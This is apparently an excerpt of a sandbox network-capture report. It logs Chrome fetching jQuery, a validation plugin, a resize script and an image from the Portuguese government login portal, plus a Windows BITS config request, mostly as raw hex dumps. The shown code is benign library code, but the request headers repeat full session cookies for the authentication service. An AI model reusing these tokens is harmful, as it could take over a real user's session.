                                                                                                                  2024-11-14 13:59:56 UTC15983INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 56 61 6c 69 64 61 74 69 6f 6e 20 50 6c 75 67 69 6e 20 2d 20 76 31 2e 31 33 2e 31 20 2d 20 31 30 2f 31 34 2f 32 30 31 34 0d 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 76 61 6c 69 64 61 74 69 6f 6e 2e 6f 72 67 2f 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 4a c3 b6 72 6e 20 5a 61 65 66 66 65 72 65 72 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 61 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 65 78 74 65 6e 64 28 61 2e 66 6e 2c 7b 76 61 6c
                                                                                                                  Data Ascii: /*! jQuery Validation Plugin - v1.13.1 - 10/14/2014 * http://jqueryvalidation.org/ * Copyright (c) 2014 Jrn Zaefferer; Licensed MIT */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){a.extend(a.fn,{val
                                                                                                                  2024-11-14 13:59:56 UTC5604INData Raw: 65 74 75 72 6e 20 61 2e 65 61 63 68 28 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 69 66 28 65 3d 3d 3d 21 31 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 65 6c 65 74 65 20 62 5b 64 5d 3b 69 66 28 65 2e 70 61 72 61 6d 7c 7c 65 2e 64 65 70 65 6e 64 73 29 7b 76 61 72 20 66 3d 21 30 3b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 2e 64 65 70 65 6e 64 73 29 7b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 66 3d 21 21 61 28 65 2e 64 65 70 65 6e 64 73 2c 63 2e 66 6f 72 6d 29 2e 6c 65 6e 67 74 68 3b 62 72 65 61 6b 3b 63 61 73 65 22 66 75 6e 63 74 69 6f 6e 22 3a 66 3d 65 2e 64 65 70 65 6e 64 73 2e 63 61 6c 6c 28 63 2c 63 29 7d 66 3f 62 5b 64 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 2e 70 61 72 61 6d 3f 65 2e 70 61 72 61 6d 3a 21 30 3a 64 65 6c 65 74 65 20 62 5b 64 5d 7d 7d
                                                                                                                  Data Ascii: eturn a.each(b,function(d,e){if(e===!1)return void delete b[d];if(e.param||e.depends){var f=!0;switch(typeof e.depends){case"string":f=!!a(e.depends,c.form).length;break;case"function":f=e.depends.call(c,c)}f?b[d]=void 0!==e.param?e.param:!0:delete b[d]}}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.44976962.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC906OUTGET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=18
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 852
                                                                                                                  2024-11-14 13:59:56 UTC852INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 2c 73 72 29 7b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 64 65 62 6f 75 6e 63 69 6e 67 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 4a 6f 68 6e 20 48 61 6e 6e 0d 0a 20 20 20 20 2f 2f 20 68 74 74 70 3a 2f 2f 75 6e 73 63 72 69 70 74 61 62 6c 65 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 32 30 30 39 2f 30 33 2f 32 30 2f 64 65 62 6f 75 6e 63 69 6e 67 2d 6a 61 76 61 73 63 72 69 70 74 2d 6d 65 74 68 6f 64 73 2f 0d 0a 20 20 20 20 76 61 72 20 64 65 62 6f 75 6e 63 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 66 75 6e 63 2c 20 74 68 72 65 73 68 6f 6c 64 2c 20 65 78 65 63 41 73 61 70 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 69 6d 65 6f 75 74 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 64
                                                                                                                  Data Ascii: (function($,sr){ // debouncing function from John Hann // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/ var debounce = function (func, threshold, execAsap) { var timeout; return function d


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.44977262.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC897OUTGET /autentica_static/img/background.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC389INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=80
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 43457
                                                                                                                  2024-11-14 13:59:56 UTC15995INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 ad 00 00 02 d7 08 06 00 00 00 3e 07 1f 0d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 86 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 31 34 20 37 39 2e 31 35 36 37 39 37 2c 20 32 30 31 34 2f 30 38 2f 32 30 2d 30 39 3a 35 33 3a 30 32 20 20
                                                                                                                  Data Ascii: PNGIHDR>tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02
                                                                                                                  2024-11-14 13:59:56 UTC16384INData Raw: 2c 0c 82 31 10 00 34 4c dd 53 1e 95 24 b2 45 79 ee 1b cc 87 b4 6b 43 9c e8 89 4e 4b 77 08 6f a3 44 4b c4 04 22 08 57 50 bc c6 87 ae b7 d9 e6 73 b4 aa a4 4d 44 96 16 16 a7 af 74 ed a7 ae bd 52 82 25 8a 40 f1 41 94 5d 78 d0 b5 5f f0 a6 ec 48 f9 3d b1 d0 94 e8 59 c4 33 a1 83 8b b0 b8 f0 27 96 58 c6 aa 7b 06 6e 69 e1 e6 3d 8a 42 f5 12 d7 66 aa bb 44 d1 ac f1 61 8a d5 12 d7 1e e5 4f ec d5 7b b3 15 4a ce a7 91 71 14 ae 3b 74 9a 45 c4 40 b0 9a 8b 1e 1b af 49 d2 c0 45 ab 8e d6 d5 47 cc ef 23 10 f9 06 a5 df 91 a5 7a ad 6b 2b 5d 7b c4 b5 a5 e6 cb 88 6f 9b 36 75 ca 3f dd 1a 1b 36 6e 5a ca 1b 33 cd a2 85 09 db 09 12 2d 11 03 db 4b 88 16 ee 15 ad 69 f5 53 b4 50 57 e8 1c f3 c5 1b 9f 6b be 14 b9 c8 17 70 61 1c e0 cd b5 8a 02 b5 d8 b5 c7 cc 27 fc dc cd 9b 0e b5 81 3a 9d
                                                                                                                  Data Ascii: ,14LS$EykCNKwoDK"WPsMDtR%@A]x_H=Y3'X{ni=BfDaO{Jq;tE@IEG#zk+]{o6u?6nZ3-KiSPWkpa':
                                                                                                                  2024-11-14 13:59:56 UTC389INData Raw: f9 a9 8e 78 cc 0a cd 7d b7 e7 8c 13 f0 85 d1 38 59 d3 d1 30 b0 b9 5e 5b d0 03 14 9f d1 41 6e 3d 1d e2 03 0f 07 72 ee de 29 cc e3 8d d1 b8 34 87 d6 2a 64 f5 11 3f b9 0b f9 02 39 bf c4 21 71 49 cf 4e 93 b4 00 3d 6a 86 5a 68 f7 20 74 6f 53 f8 aa 05 c5 a0 d0 38 d0 26 83 2e c4 cb 0b 72 3f db b8 35 be b7 6f c6 88 9e 68 5b 33 d0 d2 ad a1 37 c7 42 41 dc 45 39 9b 2f 42 15 e4 e3 29 0d 27 bf 87 79 8a 38 bf 2e b2 b6 ae 8e ac ad 97 d3 24 2d 08 2b 16 63 ac d6 dc 6f 14 47 46 e3 04 53 95 fc 46 6f b4 a8 e3 ee cb 31 41 0d 75 4b 8a 4a ff c4 3a 51 54 6d 97 c1 b5 90 26 70 6f 0e 2d d1 8f fa a6 27 e4 17 d4 b3 3d cc 82 90 6a 71 9a a4 15 97 fd 1f ef 9b 87 b0 61 82 ff 9c d5 5e f7 4d e8 1a 2b 2d 08 2f fe 99 93 eb 6d f3 d1 cf d7 c3 be 4e 52 07 bb 25 95 65 69 b4 2b dc 5a cd 1b 20 fa
                                                                                                                  Data Ascii: x}8Y0^[An=r)4*d?9!qIN=jZh toS8&.r?5oh[37BAE9/B)'y8.$-+coGFSFo1AuKJ:QTm&po-'=jqa^M+-/mNR%ei+Z
                                                                                                                  2024-11-14 13:59:56 UTC10689INData Raw: 2f b5 20 f3 fc e6 68 bc 55 1f 87 c2 80 c3 c7 9b 9c 4b e6 a7 49 5a e0 8d 6e a2 7f 2f 67 0b 3f 6d 6c eb 73 f2 1e 4d 45 c3 80 24 fb 0a 3f 08 2c 69 81 8d 13 17 f9 e6 7e 38 89 a5 e8 87 fa bf c3 5a dc b2 46 5e 4c 02 31 6a c1 bc 75 73 ee e7 07 41 a9 05 8b 03 3c 0e 74 21 38 24 b2 b6 ae 8d ac ad 57 d2 24 2d 54 4d 1f 8a c6 f5 d1 98 ac b9 5f 07 82 e9 17 46 e3 34 93 bf bd 91 c0 8d 85 c2 ad d9 55 c7 7b f9 e0 59 d2 fd 77 80 05 d9 f9 70 b7 a8 18 7b ba 95 b5 b5 e5 c3 0d cc 67 f5 bb 16 1a 3c e6 0d 07 fa 9c 0b c5 c2 2e 4e 5c ff ea ea 50 da 28 d2 22 5f 64 2f df a4 3f 6f aa 92 41 93 cc af 45 e3 6d a6 18 56 23 41 c5 f6 0b ac f9 4a 55 92 7a f1 b7 53 24 9a b2 5b 63 dd aa e2 b5 bc 96 0c 5a ee e4 ff 50 0e af 9d 43 c3 71 3e ff 42 f1 f0 7a ff ac fd 3b 4d d2 8a 4f a2 6f b1 50 fa 85
                                                                                                                  Data Ascii: / hUKIZn/g?mlsME$?,i~8ZF^L1jusA<t!8$W$-TM_F4U{Ywp{g<.N\P("_d/?oAEmV#AJUzS$[cZPCq>Bz;MOoP


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.449773184.28.90.27443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Range: bytes=0-2147483646
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-11-14 13:59:56 UTC514INHTTP/1.1 200 OK
                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                  Cache-Control: public, max-age=25937
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2
                                                                                                                  2024-11-14 13:59:56 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.44977462.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC919OUTGET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 95790
                                                                                                                  2024-11-14 13:59:56 UTC16014INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69
                                                                                                                  Data Ascii: /*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wi
                                                                                                                  2024-11-14 13:59:56 UTC16384INData Raw: 61 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 29 3b 72 65 74 75 72 6e 20 64 5b 75 5d 3f 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 65 29 7b 76 61 72 20 66 2c 67 3d 64 28 61 2c 6e 75 6c 6c 2c 65 2c 5b 5d 29 2c 68 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 68 2d 2d 29 28 66 3d 67 5b 68 5d 29 26 26 28 61 5b 68 5d 3d 21 28 62 5b 68 5d 3d 66 29 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 62 5b 30 5d 3d 61 2c 64 28 62 2c 6e 75 6c 6c 2c 66 2c 63 29 2c 21 63 2e 70 6f 70 28 29 7d 7d 29 2c 68 61 73 3a 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 66 62 28 61 2c 62 29 2e 6c 65 6e 67 74 68 3e 30 7d 7d 29 2c 63 6f 6e 74 61 69 6e 73 3a
                                                                                                                  Data Ascii: a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:
                                                                                                                  2024-11-14 13:59:56 UTC370INData Raw: 5d 2e 64 61 74 61 2c 62 29 29 2c 67 3d 6a 5b 6b 5d 2c 65 7c 7c 28 67 2e 64 61 74 61 7c 7c 28 67 2e 64 61 74 61 3d 7b 7d 29 2c 67 3d 67 2e 64 61 74 61 29 2c 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 3d 64 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 28 66 3d 67 5b 62 5d 2c 6e 75 6c 6c 3d 3d 66 26 26 28 66 3d 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 29 29 3a 66 3d 67 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 64 2c 65 2c 66 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 67 3d 66 3f 6d 2e 63 61 63 68 65 3a 61 2c 68 3d 66 3f 61 5b 6d 2e 65 78 70 61 6e 64 6f 5d 3a 6d 2e 65 78 70 61 6e 64 6f 3b 69 66 28
                                                                                                                  Data Ascii: ].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(
                                                                                                                  2024-11-14 13:59:57 UTC16384INData Raw: 69 6e 20 64 3f 5b 62 5d 3a 62 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 65 3d 62 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 65 6c 65 74 65 20 64 5b 62 5b 65 5d 5d 3b 69 66 28 63 3f 21 50 28 64 29 3a 21 6d 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 72 65 74 75 72 6e 7d 28 63 7c 7c 28 64 65 6c 65 74 65 20 67 5b 68 5d 2e 64 61 74 61 2c 50 28 67 5b 68 5d 29 29 29 26 26 28 66 3f 6d 2e 63 6c 65 61 6e 44 61 74 61 28 5b 61 5d 2c 21 30 29 3a 6b 2e 64 65 6c 65 74 65 45 78 70 61 6e 64 6f 7c 7c 67 21 3d 67 2e 77 69 6e 64 6f 77 3f 64 65 6c 65 74 65 20 67 5b 68 5d 3a 67 5b 68 5d 3d 6e 75 6c 6c 29 7d 7d 7d 6d 2e 65 78 74 65 6e 64 28 7b 63 61 63 68 65 3a 7b 7d 2c 6e 6f 44 61 74 61 3a 7b 22 61 70 70 6c 65 74 20 22 3a 21 30 2c 22 65 6d 62 65 64 20 22
                                                                                                                  Data Ascii: in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed "
                                                                                                                  2024-11-14 13:59:57 UTC16384INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 62 26 26 6d 2e 6e 6f 64 65 4e 61 6d 65 28 61 2c 62 29 3f 6d 2e 6d 65 72 67 65 28 5b 61 5d 2c 66 29 3a 66 7d 66 75 6e 63 74 69 6f 6e 20 76 62 28 61 29 7b 57 2e 74 65 73 74 28 61 2e 74 79 70 65 29 26 26 28 61 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3d 61 2e 63 68 65 63 6b 65 64 29 7d 66 75 6e 63 74 69 6f 6e 20 77 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6d 2e 6e 6f 64 65 4e 61 6d 65 28 61 2c 22 74 61 62 6c 65 22 29 26 26 6d 2e 6e 6f 64 65 4e 61 6d 65 28 31 31 21 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 3f 62 3a 62 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 74 72 22 29 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 74 62 6f 64 79 22 29 5b 30 5d 7c 7c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 2e
                                                                                                                  Data Ascii: void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.
                                                                                                                  2024-11-14 13:59:57 UTC16384INData Raw: 26 65 5b 33 5d 7c 7c 28 6d 2e 63 73 73 4e 75 6d 62 65 72 5b 61 5d 3f 22 22 3a 22 70 78 22 29 2c 67 3d 28 6d 2e 63 73 73 4e 75 6d 62 65 72 5b 61 5d 7c 7c 22 70 78 22 21 3d 3d 66 26 26 2b 64 29 26 26 62 63 2e 65 78 65 63 28 6d 2e 63 73 73 28 63 2e 65 6c 65 6d 2c 61 29 29 2c 68 3d 31 2c 69 3d 32 30 3b 69 66 28 67 26 26 67 5b 33 5d 21 3d 3d 66 29 7b 66 3d 66 7c 7c 67 5b 33 5d 2c 65 3d 65 7c 7c 5b 5d 2c 67 3d 2b 64 7c 7c 31 3b 64 6f 20 68 3d 68 7c 7c 22 2e 35 22 2c 67 2f 3d 68 2c 6d 2e 73 74 79 6c 65 28 63 2e 65 6c 65 6d 2c 61 2c 67 2b 66 29 3b 77 68 69 6c 65 28 68 21 3d 3d 28 68 3d 63 2e 63 75 72 28 29 2f 64 29 26 26 31 21 3d 3d 68 26 26 2d 2d 69 29 7d 72 65 74 75 72 6e 20 65 26 26 28 67 3d 63 2e 73 74 61 72 74 3d 2b 67 7c 7c 2b 64 7c 7c 30 2c 63 2e 75 6e 69
                                                                                                                  Data Ascii: &e[3]||(m.cssNumber[a]?"":"px"),g=(m.cssNumber[a]||"px"!==f&&+d)&&bc.exec(m.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,m.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.uni
